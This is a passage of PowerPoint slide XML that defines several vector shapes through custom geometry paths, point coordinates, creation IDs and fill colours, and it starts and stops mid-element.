                    <a:pt x="36526" y="9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3B6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051B25D0-E76C-590B-21C2-8CED825004D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1482061" y="3867172"/>
              <a:ext cx="36830" cy="596900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="36830" h="596900">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="582166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="596644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36526" y="14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12D23101-496B-3984-81EA-D8BC11CF69E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1509456" y="3763540"/>
              <a:ext cx="668655" cy="698500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="668655" h="698500">
                  <a:moveTo>
                    <a:pt x="668129" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="118109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="697990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668129" y="579118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66812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7" name="object 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D61227C-8EC6-B14D-5A8A-95A75F99BAD5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1505270" y="3758541"/>
              <a:ext cx="676910" cy="708025"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="676494" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="119593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="707990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28107" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3452" y="698862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="697987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4912" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="123108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28247" y="123108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="9993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="8370" y="697987"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3452" y="698862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="697987"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="668124" y="580608"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8370" y="697987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28107" y="702989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="587632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="580608"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="671583" y="579992"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668124" y="580608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671583" y="579992"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="676494" y="579992"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="671583" y="579992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="584117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="579992"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="676494" y="4998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668124" y="4998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673044" y="9123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="9993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="580608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671583" y="579992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="579992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676494" y="4998"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="8370" y="123108"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4912" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="126622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="123108"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="8370" y="126622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4912" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="127233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="126622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="28247" y="123108"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8370" y="123108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8370" y="126622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28247" y="123108"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="676910" h="708025">
                  <a:moveTo>
                    <a:pt x="668124" y="4998"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="668124" y="9993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673044" y="9123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668124" y="4998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id="{3AEE6477-E652-49EF-0882-2515DD9FBE01}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1576421" y="3829072"/>
              <a:ext cx="546735" cy="562610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="546735" h="562610">
                  <a:moveTo>
                    <a:pt x="546374" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="96773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="562354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546374" y="464819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546374" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="1B3D6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9" name="object 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAA99F1-A437-83DB-E25E-A458015B6375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399" y="4360947"/>
              <a:ext cx="141539" cy="124967"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="object 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB7482E-F7F2-7EC2-029F-C82491EB3730}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1473310" y="3739247"/>
              <a:ext cx="711835" cy="815340"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="232850" y="720422"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="136969" y="739471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136969" y="770496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269864" y="815125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365907" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273303" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268971" y="797478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271177" y="797080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173247" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148505" y="755884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147429" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="746667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190689" y="746667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="734812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="720422"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="271177" y="797080"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="268971" y="797478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273303" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271177" y="797080"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="561588" y="744676"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="271177" y="797080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273303" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365907" y="797794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="759325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="744676"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="148505" y="755884"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154471" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="757887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148505" y="755884"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="757887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154471" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173247" y="764193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="757887"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="755884"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="148505" y="755884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="757887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755884"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="746667"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147429" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="753863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="746667"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="154471" y="753863"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147429" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="755262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="753863"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="190689" y="746667"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="154471" y="746667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154471" y="753863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190689" y="746667"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="566236" y="743837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="744676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568057" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567412" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="579090" y="743376"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="568792" y="743376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="752001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="743376"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="561588" y="742183"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="744676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="742183"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="567017" y="743696"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567412" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567117" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="568792" y="743376"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567412" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568057" y="744256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568792" y="743376"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="561588" y="735999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="742183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566236" y="743837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="735999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="579090" y="735999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="561588" y="735999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567017" y="743696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568792" y="743376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="743376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="735999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="493351" y="699301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441092" y="699301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446012" y="699575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443507" y="700160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="742183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561588" y="735999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="735999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579090" y="729813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493351" y="699301"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="676251" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="119816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="717724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34006" y="735237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129488" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39387" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33858" y="717464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36763" y="716949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27885" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12753" y="704584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="704584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10275" y="135788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="127162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58959" y="127162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="674458" y="18107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672182" y="17221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="17221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="13726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676251" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="239902" y="719021"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232850" y="720422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239902" y="719021"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="250353" y="719021"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239902" y="719021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="727617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="719021"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="250353" y="689517"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232850" y="689517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243128" y="698143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="699966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="720422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239902" y="719021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="719021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="689517"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="36763" y="716949"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33858" y="717464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39387" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36763" y="716949"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="250353" y="679062"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="36763" y="716949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39387" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129488" y="718300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="699966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="689517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="689517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250353" y="679062"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="12753" y="704584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17502" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="707029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12753" y="704584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="707029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17502" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27885" y="712377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="707029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="693996" y="599138"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412439" y="650198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412439" y="707419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443507" y="700160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441092" y="699301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493351" y="699301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485128" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419206" y="687840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="685334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422757" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="657513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470321" y="657513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="613774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711499" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="606459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693996" y="599138"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="17502" y="704584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12753" y="704584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="707029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17502" y="704584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="441092" y="699301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="443507" y="700160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446012" y="699575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441092" y="699301"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="232850" y="689517"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="232850" y="699966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243128" y="698143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232850" y="689517"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="429941" y="685334"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="419206" y="687840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="685334"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="444531" y="681927"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429941" y="685334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485128" y="696375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444531" y="681927"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="429941" y="657513"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422757" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="664836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="657513"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="429941" y="664836"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422757" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="666139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429941" y="664836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="711835" h="815339">
                  <a:moveTo>
                    <a:pt x="470321" y="657513"/>
                  </a:moveTo>
                  <a:lnTo>
